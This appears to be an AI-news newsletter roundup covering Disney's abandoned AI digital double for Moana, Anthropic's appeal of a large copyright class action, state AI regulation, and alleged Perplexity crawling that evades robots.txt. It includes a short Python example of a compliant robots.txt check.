Disney "cloned" Dwayne Johnson when filming a live-action Moana, using an AI process that they were ultimately afraid to use. The use of a new technology had Disney attorneys hammering out details over how it could be deployed, what security precautions would protect the data and a host of other concerns. They also worried that the studio ultimately couldn't claim ownership over every element of the film if AI generated parts of it, people involved in the negotiations said. Disney and Metaphysic spent 18 months negotiating on and off over the terms of the contract and work on the digital double. But none of the footage will be in the final film when it's released next summer...
AI industry horrified to face largest copyright class action ever certified
A single lawsuit raised by three authors over Anthropic's AI training now threatens to "financially ruin" the entire AI industry if up to 7 million claimants end up joining the litigation and forcing a settlement.
Last week, Anthropic petitioned to appeal the class certification, urging the court to weigh questions that the district court judge, William Alsup, seemingly did not. Alsup allegedly failed to conduct a "rigorous analysis" of the potential class and instead based his judgment on his "50 years" of experience. If the appeals court denies the petition, Anthropic argued, the emerging company may be doomed. As Anthropic argued, it now "faces hundreds of billions of dollars in potential damages liability at trial in four months" based on a class certification rushed at "warp speed" that involves "up to seven million potential claimants, whose works span a century of publishing history," each possibly triggering a $150,000 fine.
States take the lead in AI regulation as federal government steers clear
The resounding defeat in Congress of a proposed moratorium on state-level AI regulation means states are free to continue filling the gap. Several states have already enacted legislation around the use of AI. All 50 states have introduced various AI-related legislation in 2025.
Four aspects of AI in particular stand out from a regulatory perspective: government use of AI, AI in health care, facial recognition, and generative AI.
AI site Perplexity uses “stealth tactics” to flout no-crawl edicts
When known Perplexity crawlers encountered blocks from robots.txt files or firewall rules, Perplexity then searched the sites using a stealth bot that followed a range of tactics to mask its activity.
If true, the evasion flouts Internet norms in place for more than three decades. In 1994, engineer Martijn Koster proposed the Robots Exclusion Protocol, which provided a machine-readable format for informing crawlers they weren’t permitted on a given site. Sites that didn’t want their content indexed installed a simple robots.txt file at the top of their site. The standard, which has been widely observed and endorsed ever since, formally became an Internet Engineering Task Force standard in 2022.
[rG: Standards don’t guarantee compliance without monitoring and enforcement.]
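The Robots Exclusion Protocol is purely advisory: a compliant crawler reads the site's robots.txt and declines to fetch disallowed paths, but nothing mechanically stops a bot that ignores it. A minimal sketch using Python's standard-library parser (the bot names and URLs here are illustrative):

```python
from urllib.robotparser import RobotFileParser

# Hypothetical robots.txt blocking one named crawler while allowing others.
robots_txt = """\
User-agent: PerplexityBot
Disallow: /

User-agent: *
Allow: /
"""

rp = RobotFileParser()
rp.parse(robots_txt.splitlines())

# A compliant crawler would check can_fetch() before requesting a page.
print(rp.can_fetch("PerplexityBot", "https://example.com/article"))  # False
print(rp.can_fetch("SomeOtherBot", "https://example.com/article"))   # True
```

Note that the check happens entirely on the crawler's side, which is exactly the monitoring-and-enforcement gap: a stealth bot that never calls the equivalent of `can_fetch()`, or that presents a different user-agent string, sails straight past the file.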
And Now For Something Completely Different …
Trivia: Which US state is closest to Africa?